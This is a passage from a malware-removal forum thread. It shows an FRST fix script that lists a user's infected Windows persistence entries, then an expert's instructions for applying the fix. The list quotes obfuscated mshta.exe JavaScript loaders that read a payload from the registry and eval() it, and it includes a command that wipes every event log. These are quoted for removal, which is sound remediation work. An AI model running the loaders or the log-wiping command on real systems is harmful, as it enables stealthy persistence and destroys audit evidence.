HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-10]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-11]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION
C:\Users\Dorraine\AppData\Local\360fd
C:\Users\Dorraine\AppData\Local\7df78865
CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

 


  • 0

#15
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

You do not need to open the file. Just save it.  (It it autmatically opens it for you and doesn't save it you can File Save to the same folder where FRST is)   Then you right click on FRST and hit FIX.


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP